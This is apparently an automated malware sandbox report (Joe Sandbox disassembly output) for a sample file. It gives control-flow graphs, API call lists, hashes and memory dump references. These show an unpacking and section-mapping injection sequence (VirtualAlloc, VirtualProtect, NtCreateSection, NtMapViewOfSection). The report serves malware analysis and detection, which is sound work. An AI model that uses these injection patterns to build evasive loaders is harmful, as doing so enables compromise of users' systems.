                                                                      • String ID:
                                                                      • API String ID: 3833638111-0
                                                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                      • Instruction ID: 55645f3c63a52d35b86a08a782845b75d678fbe41d9a4ab5a419f3a0bebda79d
                                                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                      • Instruction Fuzzy Hash: 85F0F6311007216FE7203BF49C8DB6E72E8BF99729F100129E642914C0DF70E9495BA1

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 70 479003c-4790047 71 4790049 70->71 72 479004c-4790263 call 4790a3f call 4790e0f call 4790d90 VirtualAlloc 70->72 71->72 87 479028b-4790292 72->87 88 4790265-4790289 call 4790a69 72->88 89 47902a1-47902b0 87->89 91 47902ce-47903c2 VirtualProtect call 4790cce call 4790ce7 88->91 89->91 92 47902b2-47902cc 89->92 99 47903d1-47903e0 91->99 92->89 100 4790439-47904b8 VirtualFree 99->100 101 47903e2-4790437 call 4790ce7 99->101 103 47904be-47904cd 100->103 104 47905f4-47905fe 100->104 101->99 105 47904d3-47904dd 103->105 106 479077f-4790789 104->106 107 4790604-479060d 104->107 105->104 109 47904e3-4790505 105->109 110 479078b-47907a3 106->110 111 47907a6-47907b0 106->111 107->106 112 4790613-4790637 107->112 121 4790517-4790520 109->121 122 4790507-4790515 109->122 110->111 114 479086e-47908be LoadLibraryA 111->114 115 47907b6-47907cb 111->115 116 479063e-4790648 112->116 120 47908c7-47908f9 114->120 118 47907d2-47907d5 115->118 116->106 119 479064e-479065a 116->119 123 4790824-4790833 118->123 124 47907d7-47907e0 118->124 119->106 125 4790660-479066a 119->125 126 47908fb-4790901 120->126 127 4790902-479091d 120->127 128 4790526-4790547 121->128 122->128 132 4790839-479083c 123->132 129 47907e2 124->129 130 47907e4-4790822 124->130 131 479067a-4790689 125->131 126->127 133 479054d-4790550 128->133 129->123 130->118 134 479068f-47906b2 131->134 135 4790750-479077a 131->135 132->114 136 479083e-4790847 132->136 138 47905e0-47905ef 133->138 139 4790556-479056b 133->139 140 47906ef-47906fc 134->140 141 47906b4-47906ed 134->141 135->116 142 4790849 136->142 143 479084b-479086c 136->143 138->105 144 479056d 139->144 145 479056f-479057a 139->145 146 479074b 140->146 147 47906fe-4790748 140->147 141->140 142->114 143->132 144->138 149 479059b-47905bb 145->149 150 479057c-4790599 145->150 146->131 147->146 154 47905bd-47905db 149->154 150->154 154->133
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0479024D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2253563669.0000000004790000.00000040.00001000.00020000.00000000.sdmp, Offset: 04790000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4790000_file.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: cess$kernel32.dll
                                                                      • API String ID: 4275171209-1230238691
                                                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                      • Instruction ID: 76e87e9080b9331b9d6418919f48ce6516a03de5705ae098c455337c6446efd4
                                                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                      • Instruction Fuzzy Hash: A5527874A11269DFDB64CF68D984BA8BBB1BF09314F1480D9E90DAB351DB30AE84DF14

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 372 4176a3-4176aa 373 4176b0-4176c0 372->373 374 4176c2 373->374 375 4176c8-4176cb 373->375 374->375 375->373 376 4176cd-4176ee LoadLibraryA call 417050 call 417340 375->376 381 4176f0-4176f7 376->381 382 417703-417709 381->382 383 4176f9-4176ff 381->383 384 417710-417717 382->384 385 41770b call 417040 382->385 383->382 387 417726-41772d 384->387 388 417719-417720 InterlockedDecrement 384->388 385->384 387->381 390 41772f-41773f 387->390 388->387 391 417740-417750 390->391 392 417752 391->392 393 417759-41775c 391->393 392->393 393->391 394 41775e-417769 393->394 395 417770-417775 394->395 396 417777-41777d 395->396 397 41777f-417785 395->397 396->397 398 417787-417794 396->398 397->395 397->398
                                                                      APIs
                                                                      • LoadLibraryA.KERNELBASE(004193F8), ref: 004176D2
                                                                      • InterlockedDecrement.KERNEL32(?), ref: 00417720
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2251761482.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                                      Similarity
                                                                      • API ID: DecrementInterlockedLibraryLoad
                                                                      • String ID: k`$}$
                                                                      • API String ID: 1728580480-956986773
                                                                      • Opcode ID: 582ae1f4cb5e6ab583fbd44bdbe7b913006fd6d65d456f2ddca9bf59cc153aa9
                                                                      • Instruction ID: 6a13f396818c81b553958a4f6e0fac96a639a42473e93d8a9fa1ef27fc993d3b
                                                                      • Opcode Fuzzy Hash: 582ae1f4cb5e6ab583fbd44bdbe7b913006fd6d65d456f2ddca9bf59cc153aa9
                                                                      • Instruction Fuzzy Hash: 97213330D886148BCB259F64E8857EA7B30EB49321F11487FD99A972C1CA386CD5CB9D

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 400 417050-417190 GetModuleHandleW GetProcAddress VirtualProtect
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(02B1AF70), ref: 0041712F
                                                                      • GetProcAddress.KERNEL32(00000000,0041CF58), ref: 0041716C
                                                                      • VirtualProtect.KERNELBASE(02B1ADB4,02B1AF6C,00000040,?), ref: 0041718B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2251761482.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 2099061454-3916222277
                                                                      • Opcode ID: c1a1c5f81c7b3fa9d715df135f2c4534b827a19e895be0546727b526fadbbeb5
                                                                      • Instruction ID: 6495229f78f8176a921cc79dd6658c6ebdac2eeea773cb5c0c066b47575b63c9
                                                                      • Opcode Fuzzy Hash: c1a1c5f81c7b3fa9d715df135f2c4534b827a19e895be0546727b526fadbbeb5
                                                                      • Instruction Fuzzy Hash: 62313E559C93C4CAE301CBB8FC447553B639B29744F5484689148CB3E2D7BA252AC76E

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 436 4790e0f-4790e24 SetErrorMode * 2 437 4790e2b-4790e2c 436->437 438 4790e26 436->438 438->437
                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE(00000400,?,?,04790223,?,?), ref: 04790E19
                                                                      • SetErrorMode.KERNELBASE(00000000,?,?,04790223,?,?), ref: 04790E1E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2253563669.0000000004790000.00000040.00001000.00020000.00000000.sdmp, Offset: 04790000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4790000_file.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorMode
                                                                      • String ID:
                                                                      • API String ID: 2340568224-0
                                                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                      • Instruction ID: 2040e10928fc2b22c4cbe8bf78f27d5e4ccb26b170a7b7fef5909848a6b91726
                                                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                      • Instruction Fuzzy Hash: D5D0123514512877DB003AA4DC09BCD7B5CDF05B62F008011FB0DD9180C770994046E5

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 439 4018e6-40194b call 401193 Sleep call 40141f 453 40195a-4019a5 call 401193 439->453 454 40194d-401955 call 401514 439->454 454->453
                                                                      APIs
                                                                      • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                        • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2251676061.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Section$CreateDuplicateObjectSleepView
                                                                      • String ID:
                                                                      • API String ID: 1885482327-0
                                                                      • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                      • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                                                      • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                      • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 468 401915-401918 469 4018c6-4018c7 468->469 470 40191a-40194b call 401193 Sleep call 40141f 468->470 471 4018d7 469->471 472 4018ce-4018e3 call 401193 469->472 482 40195a-4019a5 call 401193 470->482 483 40194d-401955 call 401514 470->483 471->472 483->482
                                                                      APIs
                                                                      • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                        • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2251676061.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Section$CreateDuplicateObjectSleepView
                                                                      • String ID:
                                                                      • API String ID: 1885482327-0
                                                                      • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                      • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                                                      • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                      • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 497 4018f1-40194b call 401193 Sleep call 40141f 507 40195a-4019a5 call 401193 497->507 508 40194d-401955 call 401514 497->508 508->507
                                                                      APIs
                                                                      • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                        • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2251676061.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Section$CreateDuplicateObjectSleepView
                                                                      • String ID:
                                                                      • API String ID: 1885482327-0
                                                                      • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                      • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                                                      • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                      • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F
                                                                      APIs
                                                                      • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                        • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2251676061.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Section$CreateDuplicateObjectSleepView
                                                                      • String ID:
                                                                      • API String ID: 1885482327-0
                                                                      • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                      • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                                                      • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                      • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02C1FDC4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2253380086.0000000002C1D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C1D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c1d000_file.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                      • Instruction ID: 5d89c6f6f302c18c1cce2d26dd9971ee745ef06f17608fc73e5bd7995198e362
                                                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                      • Instruction Fuzzy Hash: 26112B79A00208EFDB01DF98C985E99BBF5AF08350F158094F9489B362D771EA50EF80
                                                                      APIs
                                                                      • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                        • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2251676061.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Section$CreateDuplicateObjectSleepView
                                                                      • String ID:
                                                                      • API String ID: 1885482327-0
                                                                      • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                      • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                                                      • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                      • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F
                                                                      APIs
                                                                      • LocalAlloc.KERNELBASE(00000000,02B1AF6C,00417684), ref: 00417028
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2251761482.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                                      Similarity
                                                                      • API ID: AllocLocal
                                                                      • String ID:
                                                                      • API String ID: 3494564517-0
                                                                      • Opcode ID: cf794a0f35e8de3d8d653a5275bfdb2b453a73b5f2b2f75a86eba3631d0c60cb
                                                                      • Instruction ID: 2f0f8130ca7dcaba0d5f32f79dbe0382024477fd9a1010909bb1960a3d491594
                                                                      • Opcode Fuzzy Hash: cf794a0f35e8de3d8d653a5275bfdb2b453a73b5f2b2f75a86eba3631d0c60cb
                                                                      • Instruction Fuzzy Hash: C0B092F1D862049BD200CB50E804B603B64A309642F404414F504C2180DB302410CA10
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2253563669.0000000004790000.00000040.00001000.00020000.00000000.sdmp, Offset: 04790000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4790000_file.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .$GetProcAddress.$l
                                                                      • API String ID: 0-2784972518
                                                                      • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                      • Instruction ID: a9c99800d58d707179825f7f9be2a6cb047888a2cbdac4757c38294d0b72f624
                                                                      • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                      • Instruction Fuzzy Hash: 10315AB6910649DFEB10CF99D884AAEBBF9FF48324F14404AD941A7310D771FA45CBA4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2251676061.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #v
                                                                      • API String ID: 0-4112121772
                                                                      • Opcode ID: b6cce00e44272c3b346c781a71a24066948c2fdd51da7417d00d6227e97d3ecb
                                                                      • Instruction ID: 8b342eda7a34b2dea096b61bc040758592e52e3af04c7588a1bad881e69cb651
                                                                      • Opcode Fuzzy Hash: b6cce00e44272c3b346c781a71a24066948c2fdd51da7417d00d6227e97d3ecb
                                                                      • Instruction Fuzzy Hash: D6F06DA061E281EBDB1A0F296919531BF6C6A1674733805FFD083761D2E23D4B17A25F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2251676061.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #v
                                                                      • API String ID: 0-4112121772
                                                                      • Opcode ID: fecb3a8a54db844415a2e1bef71f7edeaef6dd4d7564fc295dfb03336b436737
                                                                      • Instruction ID: 7df6671c20cba9c0b125a2c5dad59f0ef0fb370986baf59a5ee6412d0567cba0
                                                                      • Opcode Fuzzy Hash: fecb3a8a54db844415a2e1bef71f7edeaef6dd4d7564fc295dfb03336b436737
                                                                      • Instruction Fuzzy Hash: A8F0E96065D342ABDB0B0F60A9155717F5C690672732801FFE482762C5D27D0707A24F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2251676061.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #v
                                                                      • API String ID: 0-4112121772
                                                                      • Opcode ID: 102b48951598741f63d2bc3dccd8cbc6c8ba434529aa2a86973ea2f557790a04
                                                                      • Instruction ID: ca511933a5b28aa85cb858a2c4f9adc3918de21c1b1b7b18f24455f842de9805
                                                                      • Opcode Fuzzy Hash: 102b48951598741f63d2bc3dccd8cbc6c8ba434529aa2a86973ea2f557790a04
                                                                      • Instruction Fuzzy Hash: 30F0E2A050D282EFDB0A1F2569288317F9C6A1670733801FFD083B91C2D13E4707A25F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2251676061.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #v
                                                                      • API String ID: 0-4112121772
                                                                      • Opcode ID: e697506e40fc18b1e89b069197d835560c4ae47d934abc3c31fc06bf68063514
                                                                      • Instruction ID: 6ca54dc93712ca672dcb2052c894f69c3c01cbab2e020e50f3e64b8dc9d16c88
                                                                      • Opcode Fuzzy Hash: e697506e40fc18b1e89b069197d835560c4ae47d934abc3c31fc06bf68063514
                                                                      • Instruction Fuzzy Hash: 39F0E56151D282ABDB1B4F2569550717F5C6A0770A72401FFD482B51C2E13E0717E24F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2251676061.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #v
                                                                      • API String ID: 0-4112121772
                                                                      • Opcode ID: fb335cf0d47e54c0d4b163b58812e271318afe8484c0deefa432d84bf061ab59
                                                                      • Instruction ID: b5625208c70294fe1d85df5a918749f501d715d6cf31fdde382de861c42b0134
                                                                      • Opcode Fuzzy Hash: fb335cf0d47e54c0d4b163b58812e271318afe8484c0deefa432d84bf061ab59
                                                                      • Instruction Fuzzy Hash: 65F02B91A1D3C15FDB631F7598191617FA86D6774931840FFD041A52D2F17E0B06D30B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2251676061.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #v
                                                                      • API String ID: 0-4112121772
                                                                      • Opcode ID: 0a82979ad1abcd90eb5fc18d9275e14ea313a28b34b7e2628bae92218518f56c
                                                                      • Instruction ID: 3e9ee4a9669d4f407ff3dbfcbf3d4ca987626ae5d69e3fc9a3947ca81785133e
                                                                      • Opcode Fuzzy Hash: 0a82979ad1abcd90eb5fc18d9275e14ea313a28b34b7e2628bae92218518f56c
                                                                      • Instruction Fuzzy Hash: B2E0DFA064A6817BDB171F69AA190717F9C6A1BB0771801FFD081A92C2D17E0B16D34F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2253380086.0000000002C1D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C1D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c1d000_file.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                      • Instruction ID: 86c7193f59a01530c75a1ac1fe8e53853d7ec688f5c572d32e78eb4a71cdbe05
                                                                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                      • Instruction Fuzzy Hash: E8118272340200AFD744EF55DC91EA673EAFB8A320B298059ED04CB755E675EC02D760
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2253563669.0000000004790000.00000040.00001000.00020000.00000000.sdmp, Offset: 04790000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4790000_file.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                      • Instruction ID: 438fb76fc780dc612a2f3caed06845426bb7ce73fcada4161f5853ee4b2e5713
                                                                      • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                      • Instruction Fuzzy Hash: C201F7726206408FDF21DF20E804BAA33F5FB85205F0944B4E50697342E370BD418B80
                                                                      APIs
                                                                      • BuildCommDCBA.KERNEL32(00000000,?), ref: 00417251
                                                                      • WritePrivateProfileStringA.KERNEL32(00419398,00419374,0041934C,0041933C), ref: 00417275
                                                                      • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041727D
                                                                      • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 004172BD
                                                                      • GetComputerNameW.KERNEL32(?,?), ref: 004172D1
                                                                      • SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004172DF
                                                                      • OpenJobObjectA.KERNEL32(00000000,00000000,004193C0), ref: 004172EE
                                                                      • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 004172FF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2251761482.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
                                                                      • String ID: -
                                                                      • API String ID: 113859268-2547889144
                                                                      • Opcode ID: a86f1f0194f882046147366a27b37a0b0222ba0f4a0cc77fe26ecb427af84fc1
                                                                      • Instruction ID: c46b0675b47416d80202c3d70281f3f4f52baec69b8f02f40ede2316a1a36d14
                                                                      • Opcode Fuzzy Hash: a86f1f0194f882046147366a27b37a0b0222ba0f4a0cc77fe26ecb427af84fc1
                                                                      • Instruction Fuzzy Hash: 3121DB30A8430CABD7219FA0DC45BDD7B70FB0C751F1140A9FB59AA1C1CAB819C98B59
                                                                      APIs
                                                                      • QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 00417374
                                                                      • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041738F
                                                                      • HeapDestroy.KERNEL32(00000000), ref: 004173AE
                                                                      • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 004173BD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2251761482.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                                      Similarity
                                                                      • API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                      • String ID:
                                                                      • API String ID: 4159173863-0
                                                                      • Opcode ID: d7a5cc8d7eeefd07149659bc3d851d94f0337349ccdb3bbb259457098a472d93
                                                                      • Instruction ID: ae621add1e0f4e6c3d705ecf9f7467162fa1ce6b68f8d21c2afe26eea802a05a
                                                                      • Opcode Fuzzy Hash: d7a5cc8d7eeefd07149659bc3d851d94f0337349ccdb3bbb259457098a472d93
                                                                      • Instruction Fuzzy Hash: D701F7B1A442089BD750EB64ED45BEA37B8EB0C746F41006AFB09E7281DF786D84CF59

                                                                      Execution Graph

                                                                      Execution Coverage:8.9%
                                                                      Dynamic/Decrypted Code Coverage:28.2%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:170
                                                                      Total number of Limit Nodes:6
